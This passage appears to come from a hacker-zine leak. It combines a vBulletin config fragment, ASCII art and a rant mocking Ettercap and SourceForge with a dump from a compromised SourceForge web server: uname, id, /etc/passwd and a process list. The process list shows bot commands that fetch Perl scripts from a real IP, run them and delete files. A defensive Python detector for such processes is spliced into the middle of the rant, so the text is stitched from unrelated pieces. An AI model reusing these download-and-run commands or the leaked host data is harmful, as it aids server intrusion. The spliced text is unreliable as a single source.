  2061. config['Datastore']['class'] = 'vB_Datastore_Memcached';
  2062. i = 0;
  2063. // First Server
  2064. i++;
  2065. config['Misc']['memcacheserver'][i]          = '127.0.0.1';
  2066. config['Misc']['memcacheport'][i]            = 11211;
  2067. config['Misc']['memcachepersistent'][i]      = true;
  2068. config['Misc']['memcacheweight'][i]          = 1;
  2069. config['Misc']['memcachetimeout'][i]         = 1;
  2070. config['Misc']['memcacheretry_interval'][i] = 15;
  2071. */
  2072.  
  2073. // ****** The following options are only needed in special cases ******
  2074.  
  2075.    //   ****** MySQLI OPTIONS *****
  2076.    // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  2077.    // If you need to set the default connection charset because your database
  2078.    // is using a charset other than latin1, you can set the charset here.
  2079.    // If you don't set the charset to be the same as your database, you
  2080.    // may receive collation errors.  Ignore this setting unless you
  2081.    // are sure you need to use it.
  2082. // config['Mysqli']['charset'] = 'utf8';
  2083.  
  2084.    //   Optionally, PHP can be instructed to set connection parameters by reading from the
  2085.    //   file named in 'ini_file'. Please use a full path to the file.
  2086.    //   Example:
  2087.    //   config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  2088. config['Mysqli']['ini_file'] = '';
  2089.  
  2090. // Image Processing Options
  2091.    // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
  2092. config['Misc']['maxwidth'] = 2592;
  2093. config['Misc']['maxheight'] = 1944;
  2094.  
  2095. /*======================================================================*\
  2096. || ####################################################################
  2097. || # CVS: RCSfile - Revision: 28757
  2098. || ####################################################################
  2099. \*======================================================================*/
  2100.  
  2101.  
  2102.                                        /;    ;\                        
  2103.                                    __  \\____//                        
  2104.                                   /{_\_/   `'\____                    
  2105.                                   \___   (o)  (o  }   I AM AN INJ3CT0R
  2106.        _____________________________/          :--' /     CHICK, MOO  
  2107.    ,-,'`@@@@@@@@       @@@@@@         \_    `__\                      
  2108.   ;:(  @@@@@@@@@        @@@             \___(o'o)                      
  2109.   :: )  @@@@          @@@@@@        ,'@@(  `===='                      
  2110.   :: : @@@@@:          @@@@         `@@@:                              
  2111.   :: \  @@@@@:       @@@@@@@)    (  '@@@'                              
  2112.   ;; /\      /`,    @@@@@@@@@\   :@@@@@)                              
  2113.   ::/  )    {_----------------:  :~`,~~;                              
  2114.  ;;'`; :   )                  :  / `; ;                                
  2115. ;;;; : :   ;                  :  ;  ; :                                
  2116. `'`' / :  :                   :  :  : :                                
  2117.     )_ \__;      ";"          :_ ;  \_\       `,','                    
  2118.     :__\  \    * `,'*         \  \  :  \   *  8`;'*  *                
  2119.         `^'     \ :/           `^'  `-^-'   \v/ :  \/   BA            
  2120.  
  2121.  
  2122.  
  2137.  
  2138. ,_._._._._._._._|____________________________________________________
  2139. |_|_|_|_|_|_|_|_|___________________________________________________/
  2140.    ~ ettercap ~ !                                                    
  2141.                                                                      
  2142. You would think that the authors of Ettercap, one of the most  popular
  2143. whitehat  pentesting  tools,  would  know  the  basics  of   security.
  2144. Apparently they don't, or they just  don't  give  a  shit  about  what
  2145. happens to their users.                                              
  2146.                                                                      
  2147. So, why is their website so  insecure?  Ettercap's  message  board  is
  2148. hosted at Sourceforge, so they share a server with thousands of  other
  2149. customers. Every single customer  is  able  to  execute  commands  and
  2150. access the other project directories. Pretty stupid, eh? You only need
  2151. to find one hole in one hosted site and you can access ALL the project
  2152. databases. Of course  that  isn't  ALoR's  fault,  it's  Sourceforge's
  2153. fault. Regardless, people who care about security and  data  integrity
  2154. wouldn't use such a shitty provider,  would  they?  To  be  fair,  the
  2155. Ettercap project is dead. Most of the admins have been inactive for  a
  2156. few years now, but that  is  no  excuse  for  such  a  security  mess.
  2157. Especially since the server was compromised some five years ago.      
  2158.                                                                      
  2159. Just look at the process list, horrible.  Even  the  worst  perl  bots
  2160. (scax) get access. If such a poorly written  bot  can  own  this  box,
  2161. everyone can.                                                        
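Seen from the defender's side, the entry this paragraph points at (an `apache`-owned `sh -c` that downloads a script and hands it to perl) is a pattern that can be triaged straight from `ps aux` output. The following is an added example, not part of the original text; the account names, tool lists, rule wording and sample rows are assumptions made for illustration.

```python
import os
import re
from dataclasses import dataclass, field

# Assumed account and tool names; adjust them to what your hosts actually run.
WEB_USERS = {"apache", "www", "www-data", "nginx", "httpd"}
SHELLS = {"sh", "bash", "dash", "ksh"}
FETCHERS = {"wget", "curl", "lftpget", "lftp", "fetch"}
INTERPRETERS = {"perl", "python", "php", "ruby"} | SHELLS
SCRATCH_DIRS = {"/tmp", "/var/tmp", "/dev/shm"}
URL_RE = re.compile(r"(?:https?|ftp)://\S+", re.I)

R_SHELL = "web account spawned a shell with -c"
R_FETCH = "downloads remote content"
R_EXEC = "runs an interpreter after the download"
R_SCRATCH = "changes into a world-writable directory"
R_WIPE = "recursive delete"


@dataclass
class Finding:
    user: str
    pid: int
    command: str
    reasons: list = field(default_factory=list)

    @property
    def severity(self):
        # Download followed by execution is the pattern that matters most.
        both = R_FETCH in self.reasons and R_EXEC in self.reasons
        return "high" if both else "review"


def parse_ps_aux(text):
    """Yield (user, pid, command) per process row of `ps aux` output."""
    for line in text.splitlines():
        parts = line.split(None, 10)          # 10 fixed columns + COMMAND
        if len(parts) == 11 and parts[1].isdigit():
            yield parts[0], int(parts[1]), parts[10]


def stages(command):
    """Split a shell one-liner into argv lists, one per ; && || | stage."""
    body = re.sub(r"^\S+\s+-c\s+", "", command)   # drop a leading "sh -c"
    return [s.split() for s in re.split(r";|&&|\|\|?", body) if s.strip()]


def analyse(command):
    """Return the ordered, de-duplicated reasons a command line is suspicious."""
    reasons = []
    argv0 = os.path.basename(command.split()[0])
    if argv0 in SHELLS and re.match(r"\S+\s+-c\s", command):
        reasons.append(R_SHELL)
    fetched = False
    for argv in stages(command):
        tool, args = os.path.basename(argv[0]), argv[1:]
        if tool in FETCHERS and any(URL_RE.match(a) for a in args):
            fetched = True
            reasons.append(R_FETCH)
        elif tool in INTERPRETERS and fetched:
            reasons.append(R_EXEC)
        elif tool == "cd" and args and args[0].rstrip("/") in SCRATCH_DIRS:
            reasons.append(R_SCRATCH)
        elif tool == "rm" and any(re.fullmatch(r"-\w*[rR]\w*", a) for a in args):
            reasons.append(R_WIPE)
    return list(dict.fromkeys(reasons))


def scan(ps_text, web_users=WEB_USERS):
    """Flag processes owned by a web-server account that match any rule."""
    findings = []
    for user, pid, command in parse_ps_aux(ps_text):
        if user not in web_users:
            continue
        reasons = analyse(command)
        if reasons:
            findings.append(Finding(user, pid, command, reasons))
    return findings


# Constructed sample rows; 192.0.2.10 is a documentation address, bot.txt a placeholder.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      3630  0.0  0.0  67656   332 ?        Ss   Sep28   0:48 /usr/sbin/sshd
apache    4100  0.1  0.4 310000 20000 ?        S    Nov18   1:02 /usr/sbin/httpd
apache    4101  0.0  0.1  90000  6000 ?        S    Nov18   0:00 /usr/bin/perl /var/www/cgi-bin/form.pl
apache    5767  0.0  0.0   8704   828 ?        S    Nov18   0:00 sh -c cd /tmp;rm -rf *;lftpget http://192.0.2.10/bot.txt;perl bot.txt;cd /tmp; rm -rf *
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_PS):
        print(f"[{f.severity}] pid={f.pid} user={f.user}: {'; '.join(f.reasons)}")
        print(f"    {f.command}")
```

A process can overwrite its own argv, so a clean scan is not proof of a clean host.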
  2162.                                                                      
  2163. Some  good  advice  to  all  other  people/projects  who   are   using
  2164. Sourceforge: Move. There are  enough  good  alternatives.  Yes,  I  am
  2165. talking to you Vim, get the fuck out of there.  And  to  all  Ettercap
  2166. users: arp  poisoning  is  *not*  hacking.  If  you  want  to  achieve
  2167. something real, learn the fundamentals and not how to use a GUI. Don't
  2168. sniff the passwords of your friends  and  call  yourself  a  pentester
  2169. (looking at you firesheep).                                          
  2170.                                                                      
  2171.           _   _                                                      
  2172.          | | | |                                                      
  2173.       ___| |_| |_ ___ _ __ ___ _ __  __    _ __                      
  2174.      / _ \ __| __/ _ \ '__/ __| '__|/  \  | '_ \                      
  2175.     |  __/ |_| ||  __/ | | (__| |  / /\ \ | |_) |                    
  2176.      \___|\__|\__\___|_|  \___|_| /_/  \_\| .__/                      
  2177.                                           | |                        
  2178.                                           |_|                        
  2179.                     Baa.                                              
  2180.              I flood SID's                                            
  2181.                I'm a Hacker!!              Baa.                      
  2182.  Baa.           Baa.              I sit at starbucks                  
  2183. I sniff packets         |               I'm a Hacker!!                
  2184. I'm a Hacker!!         |                   Baa.                      
  2185. Baa..                |                   /                            
  2186.  \         __  _    |                  /           YOUR ALL FUCKING  
  2187.   \    .-.'  `; `-._  __  _         __  _               SHEEP.        
  2188.    \  (_,         .-:'  `; `-._.-.:'  `; `-._                        
  2189.     ,'o"(  "HACKE(_,          (_,            )                        
  2190.    (__,-'      ,'o"(  "HACKE,'o"(  "HACKER"   )>   STOP BEING SHEEP!  
  2191.       (       (__,-'       (__,-'             )                      
  2192.        `-'._.--._(             (             )     FUCKING INNOVATE!  
  2193.           |||  |||`-'._.--._.-' `-'._.--._.-'                        
  2194.                      |||  |||      |||  |||                          
  2195.  
  2196. $ uname -a
  2197. Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
  2198.  
  2199. $ id
  2200. uid=48(apache) gid=48(apache) groups=48(apache),302(amqp)
  2201.  
  2202. $ cat /etc/passwd
  2203. root:x:0:0:root:/root:/bin/bash
  2204. bin:x:1:1:bin:/bin:/sbin/nologin
  2205. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2206. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2207. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2208. sync:x:5:0:sync:/sbin:/bin/sync
  2209. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2210. halt:x:7:0:halt:/sbin:/sbin/halt
  2211. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2212. news:x:9:13:news:/etc/news:
  2213. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2214. operator:x:11:0:operator:/root:/sbin/nologin
  2215. games:x:12:100:games:/usr/games:/sbin/nologin
  2216. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2217. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2218. nobody:x:99:99:Nobody:/:/sbin/nologin
  2219. dbus:x:81:81:System message bus:/:/sbin/nologin
  2220. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  2221. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2222. exim:x:93:93::/var/spool/exim:/sbin/nologin
  2223. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
  2224. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2225. nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2226. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2227. pcap:x:77:77::/var/arpwatch:/sbin/nologin
  2228. avahi:x:70:70:Avahi daemon:/:/sbin/nologin
  2229. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2230. rpm:x:37:37::/var/lib/rpm:/sbin/nologin
  2231. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2232. xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
  2233. named:x:25:25:Named:/var/named:/sbin/nologin
  2234. sashroot:x:0:500:sashroot:/sashroot:/bin/bash
  2235. osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin
  2236. puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin
  2237. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2238. vhost:*:310:310:Vhost User:/home/vhost:/bin/bash
  2239. rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash
  2240. nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false
  2241. nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin
  2242. dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false
  2243. www:*:448:448:WWW User:/var/www:/bin/bash
  2244. sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash
  2245. sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash
  2246. avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
  2247. oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
  2248. munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin
  2249. rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin
  2250.  
  2251. $ ps auxwww
  2252. USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
  2253. root         1  0.0  0.0  10352    80 ?        Ss   Sep28   0:46 init [3]
  2254. root         2  0.0  0.0      0     0 ?        S<   Sep28   1:58 [migration/0]
  2255. root         3  0.0  0.0      0     0 ?        SN   Sep28   0:01 [ksoftirqd/0]
  2256. root         4  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/0]
  2257. root         5  0.0  0.0      0     0 ?        S<   Sep28   0:03 [migration/1]
  2258. root         6  0.0  0.0      0     0 ?        SN   Sep28   0:48 [ksoftirqd/1]
  2259. root         7  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/1]
  2260. root         8  0.0  0.0      0     0 ?        S<   Sep28   0:03 [migration/2]
  2261. root         9  0.0  0.0      0     0 ?        SN   Sep28   0:09 [ksoftirqd/2]
  2262. root        10  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/2]
  2263. root        11  0.0  0.0      0     0 ?        S<   Sep28   0:03 [migration/3]
  2264. root        12  0.0  0.0      0     0 ?        SN   Sep28   1:42 [ksoftirqd/3]
  2265. root        13  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/3]
  2266. root        14  0.0  0.0      0     0 ?        S<   Sep28   0:14 [migration/4]
  2267. root        15  0.0  0.0      0     0 ?        SN   Sep28   0:02 [ksoftirqd/4]
  2268. root        16  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/4]
  2269. root        17  0.0  0.0      0     0 ?        S<   Sep28   0:20 [migration/5]
  2270. root        18  0.0  0.0      0     0 ?        SN   Sep28   0:04 [ksoftirqd/5]
  2271. root        19  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/5]
  2272. root        20  0.0  0.0      0     0 ?        S<   Sep28   0:09 [migration/6]
  2273. root        21  0.0  0.0      0     0 ?        SN   Sep28   0:03 [ksoftirqd/6]
  2274. root        22  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/6]
  2275. root        23  0.0  0.0      0     0 ?        S<   Sep28   0:08 [migration/7]
  2276. root        24  0.0  0.0      0     0 ?        SN   Sep28   0:03 [ksoftirqd/7]
  2277. root        25  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/7]
  2278. root        26  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/0]
  2279. root        27  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/1]
  2280. root        28  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/2]
  2281. root        29  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/3]
  2282. root        30  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/4]
  2283. root        31  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/5]
  2284. root        32  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/6]
  2285. root        33  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/7]
  2286. root        34  0.0  0.0      0     0 ?        S<   Sep28   0:00 [khelper]
  2287. root       105  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kthread]
  2288. root       116  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/0]
  2289. root       117  0.0  0.0      0     0 ?        S<   Sep28   0:01 [kblockd/1]
  2290. root       118  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/2]
  2291. root       119  0.0  0.0      0     0 ?        S<   Sep28   0:01 [kblockd/3]
  2292. root       120  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/4]
  2293. root       121  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/5]
  2294. root       122  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/6]
  2295. root       123  0.0  0.0      0     0 ?        S<   Sep28   0:01 [kblockd/7]
  2296. root       124  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kacpid]
  2297. root       237  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/0]
  2298. root       238  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/1]
  2299. root       239  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/2]
  2300. root       240  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/3]
  2301. root       241  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/4]
  2302. root       242  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/5]
  2303. root       243  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/6]
  2304. root       244  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/7]
  2305. root       247  0.0  0.0      0     0 ?        S<   Sep28   0:00 [khubd]
  2306. root       249  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kseriod]
  2307. root       364  0.0  0.0      0     0 ?        S    Sep28   0:00 [khungtaskd]
  2308. root       367  0.0  0.0      0     0 ?        S<   Sep28  29:37 [kswapd0]
  2309. root       368  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/0]
  2310. root       369  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/1]
  2311. root       370  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/2]
  2312. root       371  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/3]
  2313. root       372  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/4]
  2314. root       373  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/5]
  2315. root       374  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/6]
  2316. root       375  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/7]
  2317. root       539  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kpsmoused]
  2318. root       618  0.0  0.0      0     0 ?        S<   Sep28   0:00 [scsi_eh_0]
  2319. root       637  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/0]
  2320. root       638  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/1]
  2321. root       639  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/2]
  2322. root       640  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/3]
  2323. root       641  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/4]
  2324. root       642  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/5]
  2325. root       643  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/6]
  2326. root       644  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/7]
  2327. root       645  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata_aux]
  2328. root       664  0.0  0.0      0     0 ?        S<   Sep28   0:00 [scsi_eh_1]
  2329. root       665  0.0  0.0      0     0 ?        S<   Sep28   5:14 [usb-storage]
  2330. root       667  0.0  0.0      0     0 ?        S<   Sep28   0:00 [scsi_eh_2]
  2331. root       668  0.0  0.0      0     0 ?        S<   Sep28   1:45 [usb-storage]
  2332. root       679  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kstriped]
  2333. root       716  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ksnapd]
  2334. root       755  0.0  0.0      0     0 ?        S<   Sep28  30:00 [kjournald]
  2335. root       780  0.0  0.0      0     0 ?        S<   Sep28   0:02 [kauditd]
  2336. root       813  0.0  0.0  12764   168 ?        S<s  Sep28   0:00 /sbin/udevd -d
  2337. root      1571  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kedac]
  2338. root      2416  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/0]
  2339. root      2417  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/1]
  2340. root      2418  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/2]
  2341. root      2419  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/3]
  2342. root      2420  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/4]
  2343. root      2421  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/5]
  2344. root      2422  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/6]
  2345. root      2423  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/7]
  2346. root      2424  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpath_handlerd]
  2347. root      2448  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kjournald]
  2348. root      2931  0.0  0.0      0     0 ?        S<   Sep28   0:00 [bond0]
  2349. root      3221  0.0  0.0  92864   476 ?        S<sl Sep28   2:13 auditd
  2350. root      3223  0.0  0.0  81804   292 ?        S<sl Sep28   2:33 /sbin/audispd
  2351. root      3253  0.0  0.0   5912   308 ?        Ss   Sep28   1:09 syslogd -m 0
  2352. root      3256  0.0  0.0   3808   196 ?        Ss   Sep28   0:15 klogd -x
  2353. root      3270  0.0  0.0  10764   280 ?        Ss   Sep28   1:06 irqbalance
  2354. named     3307  0.0  0.0 291644  3428 ?        Ssl  Sep28  79:54 /usr/sbin/named -u named
  2355. rpc       3341  0.0  0.0   8056    32 ?        Ss   Sep28   0:00 portmap
  2356. root      3378  0.0  0.0      0     0 ?        S<   Sep28  44:14 [rpciod/0]
  2357. root      3379  0.0  0.0      0     0 ?        S<   Sep28   0:19 [rpciod/1]
  2358. root      3380  0.0  0.0      0     0 ?        S<   Sep28   0:16 [rpciod/2]
  2359. root      3381  0.0  0.0      0     0 ?        S<   Sep28   0:19 [rpciod/3]
  2360. root      3382  0.0  0.0      0     0 ?        S<   Sep28   1:01 [rpciod/4]
  2361. root      3383  0.0  0.0      0     0 ?        S<   Sep28   0:17 [rpciod/5]
  2362. root      3384  0.0  0.0      0     0 ?        S<   Sep28   0:16 [rpciod/6]
  2363. root      3385  0.0  0.0      0     0 ?        S<   Sep28   0:18 [rpciod/7]
  2364. rpcuser   3398  0.0  0.0  10164   212 ?        Ss   Sep28   0:00 rpc.statd
  2365. root      3421  0.0  0.0  55448     4 ?        Ss   Sep28   0:00 rpc.idmapd
  2366. dbus      3444  0.0  0.0  21260     4 ?        Ss   Sep28   0:00 dbus-daemon --system
  2367. root      3498  0.0  0.0      0     0 ?        S<   Sep28   9:35 [nfsiod]
  2368. root      3499  0.0  0.0      0     0 ?        S    Sep28   0:00 [lockd]
  2369. root      3568  0.0  0.0   3804     4 ?        Ss   Sep28   0:00 /usr/sbin/acpid
  2370. nscd      3589  0.0  0.0 252376   828 ?        Ssl  Sep28  24:19 /usr/sbin/nscd
  2371. root      3630  0.0  0.0  67656   332 ?        Ss   Sep28   0:48 /usr/sbin/sshd
  2372. root      3647  0.0  0.0  22072   412 ?        Ss   Sep28   1:15 xinetd -stayalive -pidfile /var/run/xinetd.pid
  2373. ntp       3667  0.0  0.0  23820  5452 ?        SLs  Sep28   0:31 ntpd -u ntp:ntp -p /var/run/ntpd.pid
  2374. exim      3686  0.0  0.0  80572   580 ?        Ss   Sep28   0:35 /usr/sbin/exim -bd -q1h
  2375. root      3824  0.0  0.0  72920   488 ?        Ss   Sep28   0:36 crond
  2376. root      3839  0.0  0.0  95052  3052 ?        Ss   Sep28   0:36 /usr/sbin/munin-node
  2377. root      4211  0.0  0.0  69544     4 ?        Ssl  Oct13   0:00 sfcbd -d
  2378. root      4213  0.0  0.0  59300     4 ?        S    Oct13   0:00 sfcbd -d
  2379. root      4214  0.0  0.0  71740     4 ?        S    Oct13   0:00 sfcbd -d
  2380. root      4274  0.0  0.0 159036  3408 ?        Sl   Oct13   5:06 /usr/sbin/snmpd -LSnd -Lf /dev/null -p /var/run/snmpd.pid -a -c /etc/snmp/snmpd.sfinc-utils.conf
  2381. root      4303  0.0  0.0  61380     4 ?        S    Oct13   0:00 sfcbd -d
  2382. root      4417  0.0  0.0      0     0 ?        S    Nov24   0:12 [pdflush]
  2383. root      4565  0.0  0.0 279692  2792 ?        Ssl  Oct13   8:44 /opt/dell/srvadmin/sbin/dsm_sa_datamgrd
  2384. root      4568  0.0  0.0  61360     4 ?        S    Oct13   0:00 sfcbd -d
  2385. root      4571  0.0  0.0  73688     4 ?        S    Oct13   0:00 sfcbd -d
  2386. root      4864  0.0  0.0 174704   528 ?        Ssl  Oct13   0:36 /opt/dell/srvadmin/sbin/dsm_sa_eventmgrd
  2387. root      4925  0.0  0.0 254748  2084 ?        Ssl  Oct13  15:43 /opt/dell/srvadmin/sbin/dsm_sa_snmpd
  2388. avahi     5106  0.0  0.0  21612   532 ?        Ss   Sep28   0:00 avahi-daemon: running [sfp-web-9.local]
  2389. avahi     5107  0.0  0.0  21480   200 ?        Ss   Sep28   0:00 avahi-daemon: chroot helper
  2390. 68        5156  0.0  0.0  29540  1216 ?        Ss   Sep28   0:52 hald
  2391. root      5157  0.0  0.0  21700   448 ?        S    Sep28   0:00 hald-runner
  2392. 68        5188  0.0  0.0  10656   484 ?        S    Sep28   0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
  2393. 68        5200  0.0  0.0  10660   480 ?        S    Sep28   0:00 hald-addon-keyboard: listening on /dev/input/event0
  2394. root      5208  0.0  0.0  10232   432 ?        S    Sep28   4:39 hald-addon-storage: polling /dev/scd0
  2395. root      5213  0.0  0.0  10232   432 ?        S    Sep28   1:13 hald-addon-storage: polling /dev/hda
  2396. root      5215  0.0  0.0  10232   440 ?        S    Sep28   1:07 hald-addon-storage: polling /dev/sdb
  2397. root      5245  0.0  0.0  35904   240 ?        S    Sep28   0:00 /usr/sbin/osirisd -r /var/lib/osiris
  2398. osiris    5246  0.0  0.0  36116   748 ?        S    Sep28   0:00 /usr/sbin/osirisd -r /var/lib/osiris
  2399. root      5249  0.0  0.0   3796   436 tty1     Ss+  Sep28   0:00 /sbin/mingetty tty1
  2400. root      5250  0.0  0.0   3796   436 tty2     Ss+  Sep28   0:00 /sbin/mingetty tty2
  2401. root      5251  0.0  0.0   3796   436 tty3     Ss+  Sep28   0:00 /sbin/mingetty tty3
  2402. root      5252  0.0  0.0   3796   436 tty4     Ss+  Sep28   0:00 /sbin/mingetty tty4
  2403. root      5254  0.0  0.0   3796   436 tty5     Ss+  Sep28   0:00 /sbin/mingetty tty5
  2404. root      5256  0.0  0.0   3796   436 tty6     Ss+  Sep28   0:00 /sbin/mingetty tty6
  2405. apache    5767  0.0  0.0   8704   828 ?        S    Nov18   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2406. apache    5769  0.0  0.0  58608  1508 ?        S    Nov18   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2407. apache    8772  0.0  0.4 395468 38516 ?        S    Nov23   0:02 /usr/sbin/httpd
  2408. apache    9928  0.0  0.4 393956 39732 ?        S    Nov24   0:05 /usr/sbin/httpd
  2409. root     10444  0.0  0.0 316928  6416 ?        Ss   Nov16   0:27 /usr/sbin/httpd
  2410. root     10445  0.0  0.0   3852   504 ?        S    Nov16   1:57 /usr/sbin/cronolog --symlink=/var/local/log/error_log /var/local/log/%Y/%m/%d/error.log
  2411. root     10447  0.0  0.0   3848   440 ?        S    Nov16   1:23 /usr/sbin/cronolog --symlink=/var/local/log/vhost_log /var/local/log/%Y/%m/%d/vhost_log
  2412. root     10448  0.0  0.0   3848   460 ?        S    Nov16   5:50 /usr/sbin/cronolog --symlink=/var/local/log/access_log /var/local/log/%Y/%m/%d/access_log
  2413. root     10449  0.0  0.0   3856   440 ?        S    Nov16   0:03 /usr/sbin/cronolog --symlink=/var/local/log/developerweb_log /var/local/log/%Y/%m/%d/developerweb_log
  2414. root     10450  0.0  0.2 125312 18580 ?        Sl   Nov16  10:28 /usr/bin/perl -w /var/local/mastertree/host/sfp-web/scripts/vhost_rewriter
  2415. apache   10865  0.0  0.3 390016 25028 ?        S    Nov24   0:01 /usr/sbin/httpd
  2416. apache   11814  0.0  0.0   8704  1016 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2417. apache   11816  0.0  0.0  58608  2620 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2418. apache   12188  0.0  0.0   8704   980 ?        S    Nov24   0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod  x b;perl b;cd /tmp;rm -rf *;
  2419. apache   12189  0.0  0.0  58616  2624 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/b";
  2420. root     12523  0.0  0.0  56648   392 ?        Ss   Nov04   0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
  2421. nginx    12524  0.2  0.0  57388  1500 ?        S    Nov04  68:37 nginx: worker process                  
  2422. nginx    12525  0.1  0.0  57764  1840 ?        S    Nov04  59:01 nginx: worker process                  
  2423. nginx    12526  0.2  0.0  57456  1520 ?        S    Nov04  64:31 nginx: worker process                  
